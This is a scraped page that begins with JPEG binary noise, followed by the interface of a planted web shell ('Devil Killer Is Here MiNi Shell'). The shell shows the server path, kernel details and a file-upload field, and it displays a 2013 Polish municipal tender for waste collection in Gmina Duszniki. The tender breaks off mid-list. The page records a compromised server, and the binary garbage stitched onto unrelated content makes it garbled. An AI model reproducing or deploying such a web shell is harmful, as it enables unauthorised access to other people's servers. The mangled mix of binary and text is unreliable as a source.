JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130418/59323-N-2013.html

<p class="kh_header"><b>Duszniki: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Duszniki</b><br>
<b>Numer ogłoszenia: 59323 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Duszniki , ul. Sportowa 1, 64-550 Duszniki, woj. wielkopolskie, tel. 61 2919075, 2919400, faks 61 2919131.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.duszniki.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Duszniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Obieranie i zagospodarowanie odpad. kom. od właścicieli nieruchomości zamieszkałych na terenie Gminy Duszniki
1. Obszar Gminy Duszniki wynosi 15 628 ha. W skład Gminy Duszniki wchodzi 20 miejscowości (17 sołectw). Gmina Duszniki liczy wg ewidencji ludności prowadzonej przez Urząd Gminy w Dusznikach: 8609 mieszkańców (stan na 15 kwietnia 2013r.). Przeważająca część mieszkańców zamieszkuje budynki jednorodzinne. Szacunkowa liczba gospodarstw domowych - ok. 2131.
W trakcie trwania zam. liczba nieruchomości zamieszkałych może ulec zmianie w wyniku oddania do użytku i zamieszkania nowych budynków lub wyludnienia. Przyjmuje się ok. 15 proc. zmienną liczby gospodarstw domowych podczas realizacji zam.. Przekroczenie tego progu może skutkować zmianą ustaleń umowy.
Zbiórka, wywóz i zagospodarowanie odpadów winno odbywać się zgodnie z wytycznymi Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Wielkopolskiego na lata 2012-2017 oraz przepisami prawa polskiego.
2. Zabudowa jednorodzinna.
Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany pojemnikowo-workowy zbiórki odpad. kom..
a) Niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów:
niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów zapewni właściciel nieruchomości i ustawi je w miejscu umożliwiającym swobodny dojazd i dostęp.
Częstotliwość załadunku i wywozu przez Wykonawcę odpad. kom. (zmieszanych) - co 21 dni w godz. 7:00 - 20:00.
b) Selektywnie zbierane odpady komunalne:
selektywna zbiórka odpad. kom. na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym. Wprowadza się następujące rodzaje worków:
 żółty - do gromadzenia odpadów z tworzyw sztucznych,
 niebieski - do gromadzenia odpadów z papieru i tektury,
 zielony - do gromadzenia odpadów ze szkła.
Worki z nadrukiem odpowiadającym rodzajowi poszczególnych gromadzonych odpadów zapewnia wykonawca w ilości niezbędnej do odbioru, na każdą z wyżej wymienionych frakcji.
Charakterystyka worków do selektywnej zbiórki odpadów:
 materiał - folia polietylenowa LDPE,
 pojemność - 120 l
 grubość - co najmniej 60 mikronów.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów zebranych selektywnie - co 21 dni w godz. 7:00 - 20:00.
c) Odpady biodegradowalne (w tym zielone):
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
d) Odpady wielkogabarytowe i meble:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
e) Zużyty sprzęt elektryczny i elektroniczny:
nie jest objęty niniejszym postępowaniem o udzielenie zam. publ..
f) Odpady budowlane i rozbiórkowe:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
g) Chemikalia oraz odpady niebezpieczne typu leki:
nie są objęte niniejszym postępowaniem o udzielenie zam. publ..
h) Zużyte baterie i akumulatory:
nie są objęte niniejszym postępowaniem o udzielenie zam. publ..
i) Metale:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
j) Zużyte opony:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
3. Zabudowa wielorodzinna.
Na terenie zabudowy wielorodzinnej obowiązywać będzie system mieszany pojemnikowo-workowy zbiórki odpad. kom..
a) Niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów:
niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów zapewniają właściciel nieruchomości i ustawiają je w miejscu umożliwiającym swobodny dojazd i dostęp.
Częstotliwość załadunku i wywozu przez Wykonawcę odpad. kom. (zmieszanych) - co 21 dni w godz. 7:00 - 20:00.
b) Selektywnie zbierane odpady komunalne:
selektywna zbiórka odpad. kom. na terenie zabudowy wielorodzinnej będzie się odbywać w systemie workowym. Wprowadza się następujące rodzaje worków:
 żółty - do gromadzenia odpadów z tworzyw sztucznych,
 niebieski - do gromadzenia odpadów z papieru i tektury,
 zielony - do gromadzenia odpadów ze szkła.
Worki z nadrukiem odpowiadającym rodzajowi poszczególnych gromadzonych odpadów zapewnia wykonawca w ilości niezbędnej do odbioru, na każdą z wyżej wymienionych frakcji.
Charakterystyka worków do selektywnej zbiórki odpadów:
 materiał - folia polietylenowa LDPE,
 pojemność - 120 l
 grubość - co najmniej 60 mikronów.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów zebranych selektywnie - co 21 dni w godz. 7:00 - 20:00.
c) Odpady biodegradowalne (w tym zielone):
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
d) Odpady wielkogabarytowe i meble:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
e) Zużyty sprzęt elektryczny i elektroniczny:
nie jest objęty niniejszym postępowaniem o udzielenie zam. publ..
f) Odpady budowlane i rozbiórkowe:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
g) Chemikalia oraz odpady niebezpieczne typu leki:
nie są objęte niniejszym postępowaniem o udzielenie zam. publ..
h) Zużyte baterie i akumulatory:
nie są objęte niniejszym postępowaniem o udzielenie zam. publ..
i) Metale:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
j) Zużyte opony:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpad. kom. zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni rob. od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
4. Punkty selektywnej zbiórki odpadów.
Wykonawca wyposaży trzy punkty selektywnej zbiórki odpad. kom. zlokalizowane w Dusznikach, Podrzewiu i Grzebienisku oraz sołtysów wszystkich sołectw na terenie gminy Duszniki, w worki do selektywnej zbiórki odpad. kom.. Wprowadza się następujące rodzaje worków:
 żółty - do gromadzenia odpadów z tworzyw sztucznych,
 niebieski - do gromadzenia odpadów z papieru i tektury,
 zielony - do gromadzenia odpadów ze szkła.
Worki z nadrukiem odpowiadającym rodzajowi poszczególnych gromadzonych odpadów jednorazowo zapewnia wykonawca w ilości 300 sztuk, na każdą z wyżej
wymienionych frakcji, na każdy punkt oraz 150 sztuk, na każdą z wyżej wymienionych frakcji, dla każdego sołtysa. Zamawiający zastrzega możliwość zam. dodatkowych worków, w ilości zagłoszonej przez Zamawiającego.
Charakterystyka worków do selektywnej zbiórki odpadów:
 materiał - folia polietylenowa LDPE,
 pojemność - 120 l
 grubość - co najmniej 60 mikronów.
5. Wykaz urządzeń do gromadzenia odpadów.
Do gromadzenia odpadów na terenie Gminy Duszniki służą pojemniki spełniające techniczne warunki bezpieczeństwa i higieny sanitarnej, o pojemności:
 dla budynków mieszkalnych w zabudowie jednorodzinnej - 60 l na mieszkańca, jednak co najmniej jeden pojemnik 120 l na każda nieruchomość, dla osób samotnych dopuszcza się możliwość ustawienia pojemnika o pojemności 60 l,
 dla budynków mieszkalnych w zabudowie wielorodzinnej - 60 l na mieszkańca, jednak co najmniej jeden pojemnik 120 l na każda nieruchomość, dla osób samotnych dopuszcza się możliwość ustawienia pojemnika o pojemności 60 l, ponadto dopuszcza się możliwość ustawienia pojemnika o pojemności 1100 l.
Do selektywnej zbiórki odpadów Wykonawca jest zobowiązany dostarczyć worki z folii polietylenowej LDPE o grubości dostosowanej do ilości odpadów, uniemożliwiającej rozerwanie się worka, w kolorach:
 żółtym - 120 l,
 niebieskim - 120 l,
 zielonym - 120 l.
Na workach umieszcza się w widocznym miejscu na tle odpowiadającym kolorem dla danego rodzaju odpadów widoczny napis:
 SZKŁO - w przypadku worka na odpady za szkła,
 PAPIER - w przypadku worka na odpady z papieru i tektury,
 PLASTIK - w przypadku worka na odpady z tworzyw sztucznych.
6. Wykaz sprzętu technicznego.
Wykonawca musi posiadać sprzęt niezbędny do realizacji zam. lub przedstawić pisemne zobowiązanie innych podmiotów do udostępniania potencjału, w tym minimalne wymagania:
a) W posiadaniu podmiotu odbierającego odpady komunalne powinny znajdować się, co najmniej:
 dwa pojazdy przystosowane do odbierania zmieszanych odpad. kom. i pozostałości z segregacji odpadów (śmieciarki),
 dwa pojazdy przystosowane do odbierania selektywnie zebranych odpad. kom.,
 jeden pojazd do odbierania odpadów bez frakcji kompaktującej.
b) Szczegółowe wymagania dla pojazdów:
 pojazdy powinny być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu,
 konstrukcja pojazdów powinna zabezpieczać przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz powinna minimalizować oddziaływanie czynników atmosferycznych na odpady,
 pojazdy powinny być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie,
 pojazdy powinny być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
 na koniec każdego dnia roboczego pojazdy powinny być opróżnione z odpadów i parkowane wyłącznie na terenie bazy magazynowo-transportowej,
 pojazdy powinny być trwale i czytelnie oznakowane w sposób umożliwiający identyfikację przedsiębiorcy (nazwa firmy, dane adresowe, numer telefonu),
 pojazdy powinny być wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz czujników zapisujących dane o miejscach wyładunku odpadów - umożliwiający weryfikację tych danych.
c) Wymagania dla bazy magazynowo-transportowej:
 baza magazynowo-transportowa powinna być usytuowana w gminie, z terenu której odbiera te odpady lub w odległości nie większej niż 60 km od granicy tej gminy i na terenie, do którego posiada tytuł prawy,
 teren bazy transportowej powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym,
 baza magazynowo-transportowa powinna być wyposażona w:
1.miejsca przeznaczone do parkowania pojazdów,
2.pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
3.miejsca magazynowania selektywnie zebranych odpadów z grupy odpad. kom.,
4.legalizowaną samochodową wagę najazdową - w przypadku, gdy na terenie bazy następuje magazynowanie odpadów;
 miejsca magazynowania selektywnie zebranych odpad. kom. powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych,
 na terenie bazy transportowej powinien znajdować się punkt bieżącej konserwacji i napraw pojazdów, miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy transportowej,
 teren bazy magazynowo-transportowej powinien być wyposażony w urządzenia lub systemu zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001r. Prawo wodne (Dz. U. z 2012r., poz. 145, 951 i 1513 oraz z 2013r., poz. 21).
7. Szczegółowe dane charakteryzujące zamówienie.
a) Wykaz szacunkowej liczby gospodarstw domowych, a tym samym miejsc gromadzenia odpadów przedstawia się następująco:
1.Sołectwo Brzoza -Grodziszczko - liczba mieszkańców w sołectwie- 384 .,szacunkowa liczba gospodarstw domowych w Brzozie - 74 , Grodziszczku - 21, liczba mieszkańców w Brzozie - 275, Grodziszczku - 109.
2. Sołectwo Ceradz Dolny - liczba mieszkańców - 376, szacunkowa liczba gospodarstw domowych -106 , liczba mieszkańców - 376.
3. Sołectwo Chełminko - liczba mieszkańców - 184, szacunkowa liczba gospodarstw domowych - 38,
4. Sołectwo Duszniki - liczba mieszkańców - 2511, szacunkowa liczba gospodarstw domowych - 634
5. Sołectwo Grzebienisko - liczba mieszkańców - 840, szacunkowa liczba gospodarstw domowych - 203
6. Sołectwo Kunowo - liczba mieszkańców - 193, szacunkowa liczba gospodarstw domowych - 48
7. Sołectwo Mieściska Sarbia - liczba mieszkańców sołectwie - 422, szacunkowa liczba gospodarstw domowych w Mieściskach - 45 , liczba mieszkańców -180, szacunkowa liczba gospodarstw domowych w Sarbii - 70 , liczba mieszkańców -242
8. Sołectwo Młynkowo - liczba mieszkańców - 178, szacunkowa liczba gospodarstw domowych - 38
9. Sołectwo Niewierz - liczba mieszkańców - 469, szacunkowa liczba gospodarstw domowych - 115
10. Sołectwo Podrzewie - liczba mieszkańców - 850, szacunkowa liczba gospodarstw domowych - 215
11. Sołectwo Sędzinko- Zalesie - liczba mieszkańców w sołectwie - 345, szacunkowa liczba gospodarstw domowych w Sedzinku - 67 , liczba mieszkańców 262, szacunkowa liczba gospodarstw domowych w Zalesiu - 17 , liczba mieszkańców 83
12. Sołectwo Sędziny - liczba mieszkańców - 465, szacunkowa liczba gospodarstw domowych - 93
13. Sołectwo Sękowo - liczba mieszkańców - 522, szacunkowa liczba gospodarstw domowych - 124,
14. Sołectwo Wierzeja - liczba mieszkańców - 185, szacunkowa liczba gospodarstw domowych - 45
15. Sołectwo Wilczyna - liczba mieszkańców - 375, szacunkowa liczba gospodarstw domowych - 104
16. Sołectwo Wilkowo - liczba mieszkańców - 225, szacunkowa liczba gospodarstw domowych - 50
17. Sołectwo Zakrzewko - liczba mieszkańców - 85, szacunkowa liczba gospodarstw domowych - 24
b) Wykonawca zobowiązany będzie do odbierania od właścicieli nieruchomości zamieszkałych:
 niesegregowanych (zmieszanych) odpad. kom. - w ilości 60l miesięcznie na jednego mieszkańca
 tworzywa sztuczne, szkło oraz papier i makulatura - w każdej ilości
c) Rozliczenie wynagrodzenia ryczałtowego za wykonanie przedmiotu umowy nastąpi w miesięcznych ratach niezależnie od ilości zebranych odpadów. Wykonawca będzie zobowiązany odbierać odpady również z nieruchomości zamieszkałych, które powstaną w okresie trwania umowy.
d) Wymagania stawiane wykonawcy:
 wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zam..
 wymagana jest należyta staranność przy realizacji zobowiązań umowy.
 ustalenia i decyzje dotyczące wykonywania zam. uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.
 określenie przez wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zam..
 zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zam..
e) Obowiązkiem Wykonawcy będzie również posprzątanie miejsca wokół pojemników, gdzie zajdzie taka potrzeba, między innymi poprzez zabranie dostawionych przy pojemnikach worków z niesegregowanymi (zmieszanymi) odpadami komunalnymi. Wykonawca jest zobowiązany również do zabrania odpadów leżących obok altanek śmietnikowych czy pojemników jeśli jest to wynikiem jego działalności.
f) Wykonawca zobowiązany jest do odbierania odpad. kom. z poszczególnych nieruchomości zgodnie z ustalonym przez Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu, na podstawie którego będzie realizowana usługa odbioru odpad. kom. z uwzględnieniem całego okresu realizacji przedmiotu zam. z podziałem na odpady komunale (zmieszane), odpady zbierane w sposób selektywny (papier i tektura, szkło, tworzywa sztuczne). Wykonawca jest obowiązany do przedstawienia pierwszego projektu harmonogramu wywozu odpadów do dnia 10 czerwca 2013 roku, natomiast zatwierdzone harmonogramy muszą zostać dostarczona właścicielom nieruchomości w nieprzekraczalnym terminie do 30 czerwca 2013r. Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie zobowiązany do dostarczenia zmienionych harmonogramów do każdej nieruchomości objętej odbiorem odpad. kom.. Wywóz odpadów będzie odbywał się ściśle wg harmonogramu. Odbiór odpadów przez wykonawcę musi odbywać się w dni robocze, od poniedziałku do piątku, w godzinach 7:00 - 20:00. Wykonawca pod żadnym pozorem nie może w trakcie odbioru i transportu mieszać odpadów gromadzonych selektywnie z odpadami gromadzonymi w sposób nieselektywny.
g) Wykonawca zobowiązany jest do zapewnienia właścicielom nieruchomości worków do selektywnej zbiórki odpadów. Worki muszą być oznaczone przez Wykonawcę informacją o rodzaju odpadów, które należy w nich gromadzić. Worki do selektywnej zbiórki muszą też być oznaczone nazwą, adresem i numerem telefonu Wykonawcy oraz logo gminy Duszniki. Czytelna instrukcja umieszczona na workach ma ułatwić właścicielom nieruchomości prowadzenie selektywnej zbiórki odpadów. Wzór oznaczenia i opisania worków do selektywnej zbiórki odpadów zatwierdza Zamawiający. Pierwsza partia worków musi zostać dostarczona właścicielom w nieprzekraczalnym terminie do 30 czerwca 2013r. W przypadku braku właściciela, worki należy dostarczyć przedstawicielowi właściciela. Za przedstawiciela Zamawiający uważa każdego pełnoletniego domownika zamieszkującego daną posesję. Przy każdorazowym odbiorze selektywnie zebranych odpad. kom. wykonawca pozostawi worki w ilości odpowiadającej workom odebranym. Worki należy pozostawić, w miejscu widocznym przy wejściu na posesję, w sposób zabezpieczający przed np. porwaniem worków przez wiatr.
h) Wykonawca obowiązany jest umożliwić właścicielom nieruchomości zakup lub dzierżawę pojemników do gromadzenia odpadów. Koszty zakupu lub dzierżawy pojemników zostają ustalone przez Wykonawcę indywidualnie z mieszkańcami.
i) Wykonawca jest obowiązany do realizacji reklamacji (np. nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie worków na odpady segregowane) w przeciągu 36 godzin od otrzymania zawiadomienia e-mailem od Zamawiającego. Wykonanie reklamacji należy niezwłocznie potwierdzić e-mailem na adres Zamawiającego. Właściciel nieruchomości ma obowiązek wystawiania pojemników (worków) w ściśle
określonym terminie oraz przed określoną godziną. Informacje te będą zawarte w harmonogramach, które trafią do każdej nieruchomości zamieszkałej. W przypadku braku wystawionego pojemnika lub worków, w celu udokumentowania tego faktu należy sporządzić dokumentację fotograficzną z datownikiem i godziną, o której pojazd podjechał po odbiór odpadów. Każdy przypadek nieodebrania odpadów z winy właściciela Wykonawca zobowiązany jest zgłosić (z załączonym potwierdzeniem) Zamawiającemu.
j) W przypadku nieruchomości, które w części stanowią nieruchomości zamieszkałe, a w części nieruchomości na których nie zamieszkują mieszkańcy, system odbierania odpad. kom. nie obejmuje odpad. kom. powstających na części nieruchomości na której nie zamieszkują mieszkańcy (np. odpady komunalne powstające w wyniku prowadzenia działalności gospodarczej).
k) Wykonawca zobowiązany jest zapewnić Zamawiającemu odczyt z systemu monitoringu bazującego na systemie pozycjonowania satelitarnego, w który wyposażone będą pojazdy Wykonawcy. Obowiązek ten ciąży także na Wykonawcy przez okres 3 miesięcy od zakończenia obowiązywania umowy.
l) Wykonawca zobowiązany jest do prowadzenia i przekazywania Zamawiającemu ewidencji nieruchomości z których zostały odebrane zmieszane i selektywnie zbierane odpady w zakresie ilości zebranych odpadów (ilość i pojemność pojemników z odpadami zmieszanymi oraz ilość poszczególnych worków z odpadami zbieranymi selektywnie). Ewidencję taką Wykonawca zobowiązany jest przedkładać Zamawiającemu do 10 dnia miesiąca następującego po miesiącu sprawozdawczym. Ewidencję należy prowadzić w formie elektronicznej. Program, w którym będzie prowadzona ewidencja powinien być kompatybilny z programem do prowadzenia gospodarki odpadami posiadanym przez Zamawiającego (tj. programem SIGID Ewidencja i Rozliczanie Opłat za Gospodarowanie Odpadami - ERGO).
m) Wykonawca zobowiązany jest kontrolować realizowanie przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpad. kom., a w przypadku ich niedopełnienia Wykonawca zobowiązany jest przyjąć odpady jako zmieszane odpady komunalne i niezwłocznie pisemnie powiadomić o tym Zamawiającego, nie później niż w ciągu 3 dni. Do informacji Wykonawca zobowiązany będzie dołączyć dokumentację zdjęciową umożliwiającą identyfikację nieruchomości z rejestracją daty i godziny. Zamawiający zastrzega sobie prawo do udziału w wybiórczej kontroli właścicieli nieruchomości w przedmiotowym zakresie. Poprzez niedopełnienie obowiązku selektywnego zbierania odpad. kom. Zamawiający rozumie ewidentne, rażące naruszanie zasad segregacji, np. w pojemniku na odpady zmieszane znajduje się przeważająca ilość odpadów podlegających segregacji (szkło, plastik, papier) czy w przejrzystych workach na odpady segregowane naocznie zaobserwować można frakcje odpadów zabronione do gromadzenia w poszczególnych workach. W przypadku zaistnienia wątpliwości co do prawidłowości segregacji należy w takim konkretnym przypadku dokonać wnikliwszej kontroli sposobu oddawania odpadów przez danego właściciela. Wykaz nieruchomości prowadzących selektywne zbieranie odpad. kom. Zamawiający przekaże Wykonawcy do 15 czerwca 2013 roku.
n) Wykonawca zobowiązany jest do przekazywania:
